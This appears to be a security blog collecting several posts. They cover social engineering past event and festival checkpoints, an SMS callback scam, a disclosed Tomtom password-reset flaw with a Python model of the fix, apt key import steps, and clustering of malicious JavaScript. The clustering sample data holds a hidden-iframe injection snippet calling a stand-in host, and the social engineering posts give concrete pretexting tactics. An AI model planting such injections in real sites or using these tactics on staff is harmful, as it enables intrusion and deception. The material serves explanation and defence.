Yesterday there was this big commercial vendor security event in Belgium with a VIP area. I had been offered VIP entrance tickets, but at the time they were offered I wasn't even sure I wanted to go, so now I had regular tickets.
The thing was that a number of people I knew were VIP and I wanted access to the area where I was not supposed to be.
The first time I stopped at the lady checking the badges with my phone next to my ear, totally ignoring her and having a conversation with somebody who was actually inside. It was funny because I was describing the area loudly, like "I see this banner, and to the left that poster and ... ok now I see you", and just walked right in like I belonged there without getting challenged.
The second time I wanted a different approach and got challenged. I showed my badge and she said I couldn't enter. I asked why not, so she had the feeling she was doing her job. Then I said I really needed to talk to my colleague and pointed at a guy who was about to sit down. He was actually my colleague, but I could have pointed at anybody far enough away to make sure she couldn't leave her desk. Since she was alone, she had no way of going to check my story. She said ok, but I couldn't have any drinks or snacks ... sure, I said, I just needed a chat with that guy, no drinks, no snacks.
One of the guys going in with me piggybacked on my excuse and did not even have to say a word, he just smiled.
Yes, we did this for fun and giggles, but social engineering is used daily by bad people.
Friday, March 28, 2014
Sunday, March 9, 2014
SMS Scam
Hello,
I want to tell you about a scam I received last Friday on my phone. During the evening I got a text message which was a nice piece of social engineering. The text message said "Appelle moi urgent 0010664112011".
The text was in French, a language spoken in my social circle, so I could have been tempted to call back. It is a classic in Belgium that people without any calling credit send you a message that looks similar to this. For a lot of youngsters this is the way they communicate with their parents over the phone, since they are out of credit most of the time.
The form it is written in is interesting too. "Appelle moi" means "call me", so that is an instruction, and if you would still hesitate it says that it is urgent, thus trying to take away any resistance. It uses the feeling of guilt we have if we don't help somebody in need.
When I researched the number online it was immediately obvious that I was not the only one, and there are a number of variations. The best illustration of this is anruf-info.de. They collected some interesting data. If you look at the 7th, the evening I got the message, there are quite a lot of Belgians reporting it, and when a time stamp is given it was in the evening, just like mine. This could be an indication of some form of automation. As we can see, the day after, on the 8th, the scam just goes on.
Unfortunately I don't have any knowledge about how to trace the origin of this number, but it would be very interesting.
Thursday, December 12, 2013
Tomtom password reset issue.
I reported an issue at Tomtom's website on the 6th of June 2013. It was something I discovered by accident while helping out a family member who had forgotten his password. I waited until now to publicly disclose it because I wanted to give Tomtom the opportunity to fix it.
The Tomtom application installed on my family member's computer allowed him to trigger a password reset (by entering the e-mail address coupled to the account). He opened his mailbox and had a new e-mail from Tomtom with the password reset link.
I got distracted in the process by the cat (cats are masters of social engineering) and asked him to request the reset a second time. In his inbox were thus 2 e-mails from the reset service. My family isn't into computers, so when I asked him to click the link, he clicked on the first mail he saw, which was the oldest one. The reset worked and my family was happy, not realizing that this e-mail wasn't supposed to trigger the reset, since there was a newer request for it.
The link in the e-mail looks like this:
http://www.tomtom.com/myTomTom/password_reminder_confirm.php?frm_email=familymember@mail.com&frm_check=f4357e2fa574a1764edcf077eaaf95dd
As you can see the format of the link is quite basic: an e-mail address and a 32-character hexadecimal token (the length of an MD5 hash).
On my way home I was going over the situation and asked my family member if I could get a copy of the e-mails, to make sure I hadn't misinterpreted something. I wondered if I could do a password reset now that the password had already been reset.
I just clicked the link (no proxies in between) and reset the password by using the form. Thus basically anybody who had that link could reset the password, as often as they liked. What exact information you can find in the account and how valuable it is, I considered out of scope.
Since I work for CERT.be, I am familiar with the responsible disclosure guide of the NCSC. The first problem I had was finding out who I had to contact at Tomtom. There was no information on their website, but I was lucky: the whois contact worked.
In CC of my e-mail to Tomtom I put the NCSC (the CERT of The Netherlands) and CERT.be. The reason is simply a cover-my-ass strategy: Tomtom is a company in The Netherlands and I am a Belgian citizen, which is why I chose to put both national CERT teams in copy. I do not want to get in trouble for discovering a problem, I just want it to get fixed.
I got a reply from Tomtom on the 14th of June 2013. First of all they thanked me, said they would look into the problem and promised to keep me informed. The sad truth is that this last promise wasn't kept. I don't know if the reason I never got a reply is that I was truthful about the fact that I would write this blog entry about it.
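To make the two mistakes concrete (an older reset link stays valid after a newer one is requested, and a link stays valid after it has been used), here is an added example that is not Tomtom's code and does not claim to be their implementation. It models the reset flow with a token per e-mail address: the weak service only ever adds tokens, the hardened one keeps a single live token per account, makes it single-use and lets it expire. The e-mail address, password values, the 15-minute lifetime and the injectable clock are assumptions for the demonstration.

```python
import hmac
import secrets
import time

# Added example, not Tomtom's code. Models a reset link that carries an
# e-mail address plus a random token, like the frm_email / frm_check pair
# in the URL above. The two services differ only in how they treat older,
# already-used and stale tokens.


class WeakResetService:
    """Every issued token stays valid forever, even after it has been used."""

    def __init__(self):
        self._tokens = {}  # token -> email

    def request_reset(self, email):
        token = secrets.token_hex(16)  # 32 hex chars, same shape as frm_check
        self._tokens[token] = email
        return token

    def confirm(self, email, token, new_password):
        # Lookup only: nothing is invalidated, so a newer request does not
        # cancel the earlier link, and a consumed link keeps working.
        return self._tokens.get(token) == email


class HardenedResetService:
    """One live token per account, single-use, time-limited."""

    TTL_SECONDS = 15 * 60  # assumed lifetime for the example

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable so expiry can be tested
        self._pending = {}           # email -> (token, issued_at)
        self.passwords = {}          # email -> current password (demo only)

    def request_reset(self, email):
        token = secrets.token_hex(16)
        # Overwriting the entry invalidates any earlier link for this account.
        self._pending[email] = (token, self._clock())
        return token

    def confirm(self, email, token, new_password):
        entry = self._pending.get(email)
        if entry is None:
            return False
        expected, issued_at = entry
        if self._clock() - issued_at > self.TTL_SECONDS:
            self._pending.pop(email, None)   # stale: drop it and refuse
            return False
        # Constant-time comparison so the token cannot be guessed byte by byte.
        if not hmac.compare_digest(expected, token):
            return False
        del self._pending[email]             # single use: consume before acting
        self.passwords[email] = new_password
        return True


class FakeClock:
    """Deterministic clock for exercising the expiry branch."""

    def __init__(self, now=1_000_000.0):
        self.now = now

    def __call__(self):
        return self.now


def replay_scenario(service_cls, **kwargs):
    """Two reset requests for one account, then the OLDER link is used twice
    and finally the newer one once. Returns which of those succeeded."""
    svc = service_cls(**kwargs)
    email = "familymember@mail.com"          # assumed address from the post
    old = svc.request_reset(email)
    new = svc.request_reset(email)           # the second, cat-induced request
    return {
        "old_link_works": svc.confirm(email, old, "hunter2"),
        "old_link_replays": svc.confirm(email, old, "hunter3"),
        "new_link_works": svc.confirm(email, new, "hunter4"),
    }


if __name__ == "__main__":
    print("weak:    ", replay_scenario(WeakResetService))
    print("hardened:", replay_scenario(HardenedResetService))
```

With the weak service all three confirmations succeed; with the hardened one only the newest link works, and only once. In a real deployment you would additionally store only a hash of the token server-side, so that a leaked database does not hand out live reset links, and bind the token to the account rather than trusting the e-mail address from the URL.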
Monday, October 7, 2013
Adding repositories to your sources.list
Tonight I added a repo to my sources.list, but when I ran update I got an error message telling me my system could not trust the content since the GPG key was unknown. If you are regularly confronted with this you will probably know how to handle it, but I have been installing Linux for quite a lot of people who are totally new to it, so I am going to use my blog to post the solution.
When you run apt-get update it will tell you which key the system isn't sure about (the ID after NO_PUBKEY in the warning). This value will be needed.
1. The first step is to get a copy of the key onto your system. I found the following example online to illustrate this: gpg --keyserver pgpkeys.mit.edu --recv-key AED4B06F473041FA
This basically means: get a copy of key AED4B06F473041FA from the key server at MIT. MIT is not the only key server in the world, but it is a very popular one.
2. Now that the key is on your system you need to add it to apt's key ring:
gpg -a --export AED4B06F473041FA | sudo apt-key add -
Now that the key is known to apt you can run apt-get update again and you will not get any errors for that key (maybe for others, but then you just repeat the procedure). Remember only to add sources that you trust, and before step 2 compare the key's full fingerprint (gpg --fingerprint AED4B06F473041FA) with the one the repository owner publishes: a key server returns whatever somebody uploaded under that ID, and a key ID is only the tail of the fingerprint, so it is not proof of identity. On current Debian and Ubuntu releases apt-key is deprecated; the key goes into a file under /etc/apt/keyrings/ and the sources.list line gets a signed-by= option pointing at it.
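As an added example (not from the original post, and not part of apt or gpg), the small script below automates the first half of the procedure: it pulls the key IDs out of the warnings apt-get update prints, checks each against an allowlist of full fingerprints you verified out of band, and only for an allowed key emits the gpg/apt-key commands from the steps above, using the full fingerprint rather than the short ID. The apt output, repository URLs, fingerprints and the allowlist are constructed for the example; the fingerprints are placeholders, not real keys.

```python
import re

# Added example, not from the post. Parses apt's "NO_PUBKEY <id>" warnings
# and decides, from an allowlist of verified fingerprints, which keys may be
# fetched and added. Everything below is constructed sample data.

NO_PUBKEY_RE = re.compile(r"NO_PUBKEY\s+([0-9A-Fa-f]{8,40})")
SOURCE_RE = re.compile(r"GPG error:\s+(\S+)\s+(\S+)")

# Constructed apt-get update output; the format of the warning lines is the
# one apt prints, the repositories and the second key ID are made up.
SAMPLE_OUTPUT = """\
Hit http://security.debian.org wheezy/updates Release
W: GPG error: http://repo.example.org/debian wheezy Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY AED4B06F473041FA
W: GPG error: http://mirror.example.net/ubuntu precise InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 1234567890ABCDEF
"""

# Placeholder fingerprint (40 hex chars) whose last 16 characters are the
# long key ID from the post. In practice this list comes from the repository
# owner's website, checked over HTTPS, not from a key server.
ALLOWLIST = ["0123456789ABCDEF01234567AED4B06F473041FA"]


def missing_keys(apt_output):
    """Return [(repo_url, suite, keyid), ...] for every NO_PUBKEY warning."""
    found = []
    for line in apt_output.splitlines():
        m = NO_PUBKEY_RE.search(line)
        if not m:
            continue
        src = SOURCE_RE.search(line)
        url, suite = (src.group(1), src.group(2)) if src else ("?", "?")
        found.append((url, suite, m.group(1).upper()))
    return found


def trusted(keyid, allowlist):
    """Fingerprints in the allowlist that end with the reported key ID.
    A bare ID is never enough on its own: it is just the low-order bits of
    the fingerprint, and distinct keys can share one."""
    keyid = keyid.upper()
    return [fp for fp in allowlist if fp.upper().endswith(keyid)]


def import_commands(fingerprint, keyserver="pgpkeys.mit.edu"):
    """The two steps from the post, addressed by full fingerprint."""
    return [
        f"gpg --keyserver {keyserver} --recv-key {fingerprint}",
        f"gpg --fingerprint {fingerprint}",   # eyeball it once more
        f"gpg -a --export {fingerprint} | sudo apt-key add -",
    ]


def plan(apt_output, allowlist):
    """Map each reported key ID to its import commands, or None to refuse."""
    result = {}
    for _url, _suite, keyid in missing_keys(apt_output):
        matches = trusted(keyid, allowlist)
        result[keyid] = import_commands(matches[0]) if len(matches) == 1 else None
    return result


if __name__ == "__main__":
    for keyid, cmds in plan(SAMPLE_OUTPUT, ALLOWLIST).items():
        print(keyid, "->", "REFUSED (not in allowlist)" if cmds is None else cmds)
```

The second key in the sample is refused because nothing in the allowlist vouches for it; that is the point of the script. Whether you then run the printed commands or translate them to the /etc/apt/keyrings/ plus signed-by= form is up to the release you are on.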
Tuesday, August 27, 2013
Fun with Google Safe Browsing
You have probably encountered it: you want to go to a website and you get a red page saying that something is wrong with the site and malware has been found on it.
Google Safe Browsing is part of your standard Mozilla Firefox and Google Chrome browser. Google isn't the only one playing this game: Microsoft has its SmartScreen filter and most major AV solutions have something similar.
This is all fun, but what if you, as a website owner, want to know whether you have been flagged? Well, actually you can get this report. If you surf to http://www.google.com/safebrowsing/diagnostic?site= followed by your domain, you get a nice overview of what was detected for that website.
An example:
http://www.google.com/safebrowsing/diagnostic?site=google.com
It tells me that for the domain google.com in the last 90 days 903341 pages got tested, and among the detections were:
- 484 drive-by-downloads
- 252 trojans
- 103 exploits
- 46 scripting exploits
So as you can see this has some value in risk management. Personally I use this technique for information gathering when doing incident handling. You can use it in risk management to monitor your own website and those of the parties you do business with, in a rather cheap way.
Another cool little trick is that you can get more information on an Autonomous System (AS).
If you are the owner of the AS, like my current employer, who owns the Belnet AS with number 2611, Google has a nice little tool to generate alerts for your incident handlers.
Some of us don't own an AS. Thus I want to share with you one last toy for website owners: "Fetch as Google". It allows you to fetch up to 500 URLs a week for the sites you own and can be very handy to figure out if the Googlebot still sees your website as infected.
More info can be found at https://support.google.com/webmasters/answer/158587?hl=en.
Some people have trouble with https, but I haven't had that experience personally. I found a video on YouTube with Google's answer to people having trouble. Basically it works for Google too.
Monday, August 19, 2013
Playing with Social Engineering at a music festival
It is summer in the Northern hemisphere of planet earth and this means we have music festivals. Traditionally at the festival area you have two checkpoints, one for the entrance bracelet and one to inspect the backpacks for drinks.
The funny part is that people smuggle in drinks because it is kind of a challenge. My theory was that if the man checking my backpack found something, he would be happy and stop looking through the rest of it.
I packed my bag with 2 glass bottles of Belgian beer wrapped inside my sweater, and put all the rest of my bicycle gear in my backpack. The thing I had planted for the man to discover was a deodorant spray. When you just pat the backpack it feels kind of like a can of coke if you are inexperienced.
I stood in the queue and when it was my turn I presented the backpack and opened it cooperatively. I showed that I had my gear, like my helmet and everything you need to bike in a city, and the guy started patting the backpack. He found the deodorant and immediately asked me what it was. Instead of answering him I opened up the backpack and showed him the spray, and he was happy with the answer.
I gave him the frame of "the guy on his bike", so the big backpack made sense.
As expected the man had a flow in his mind:
1. look into the bag; when no bottle is visible go to 2, otherwise confiscate the bottle
2. pat the bag; when nothing is felt, let through; when something is felt, ask a question
The security problem was clearly in this last part: he knew he had to confront me with the fact that he had found something, but his flow had no step for an explanation other than "shit, bottle found", so once he got one he stopped. He was happy because he had the positive feeling that he had done his job.
For your information, my friends and I still buy our beers at the festivals, but as I said before, it is kind of a challenge to see if you can beat the system.
Monday, August 12, 2013
Inverse diff - repeated malicious javascript code
I was looking into some pages for malicious JavaScript and needed to figure out, between all the instances we found online, how many were basically the same malicious code and how many were unique.
If you have been playing with Linux for a while you will probably have run into diff, a nice little command to figure out the differences between files. What I actually needed is the opposite of the "classic" diff: the lines two files have in common. After a little search online I found the syntax:
diff --unchanged-group-format=%= --new-group-format= --old-group-format= file1 file2
In GNU diff's group formats %= stands for the lines common to both files, while the empty --old-group-format and --new-group-format suppress the lines found in only one of them (and, since no --changed-group-format is given, it defaults to the concatenation of those two, so changed groups print nothing either). To make this a bit visual:
file1 contains:
123
abc
def
999
file2 contains:
123
def
ddd
lalala
and the output will be:
123
def
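The command above answers the question for one pair of files; the actual task in the post was to sort a whole batch of samples into "same code" and "unique". The following is an added example, not from the original post, that reimplements the inverse diff in Python (using the same longest-matching-blocks idea GNU diff uses for unchanged groups) and then uses it to group samples by the share of lines they have in common. The file1/file2 content is the post's own; the JavaScript samples and the 0.7 threshold are constructed for the demonstration and the scripts are harmless placeholders.

```python
import difflib

# Added example, not from the post. common_lines() is the "inverse diff";
# similarity() and cluster() apply it to a batch of samples.


def common_lines(a, b):
    """Lines present in both sequences, in order, as
    diff --unchanged-group-format=%= would print them."""
    sm = difflib.SequenceMatcher(None, a, b, autojunk=False)
    out = []
    for i, _j, size in sm.get_matching_blocks():
        out.extend(a[i:i + size])
    return out


def similarity(a, b):
    """Share of the longer file that is common to both (0.0 .. 1.0)."""
    if not a and not b:
        return 1.0
    return len(common_lines(a, b)) / max(len(a), len(b))


def cluster(samples, threshold=0.7):
    """Greedy grouping: each sample joins the first cluster whose
    representative it resembles at least `threshold`, otherwise it starts
    a new cluster. Returns the clusters as lists of sample names."""
    clusters = []  # [(representative_name, [member names]), ...]
    for name, lines in samples.items():
        for rep_name, members in clusters:
            if similarity(samples[rep_name], lines) >= threshold:
                members.append(name)
                break
        else:
            clusters.append((name, [name]))
    return [members for _rep, members in clusters]


# The post's own example files.
FILE1 = ["123", "abc", "def", "999"]
FILE2 = ["123", "def", "ddd", "lalala"]

# Constructed samples: three variants of one injected snippet (only the
# callback host differs, or some padding is prepended) and one unrelated file.
_INJECT = [
    "var a = document.createElement('iframe');",
    "a.style.display = 'none';",
    "a.src = 'http://example.invalid/in.php';",
    "document.body.appendChild(a);",
]
SAMPLES = {
    "site1.js": _INJECT,
    "site2.js": _INJECT[:2] + ["a.src = 'http://other.invalid/x.php';"] + _INJECT[3:],
    "site3.js": ["/* pad */"] + _INJECT,
    "site4.js": ["function f(){return 1;}", "f();"],
}


if __name__ == "__main__":
    print("\n".join(common_lines(FILE1, FILE2)))   # the post's output: 123, def
    for group in cluster(SAMPLES):
        print(group)
```

Two practical notes for real samples: minified scripts are usually one line, so split on ';' or run them through a pretty-printer before comparing, and normalise the things attackers rotate (hostnames, random variable names) if you want variants of one kit to land in one cluster.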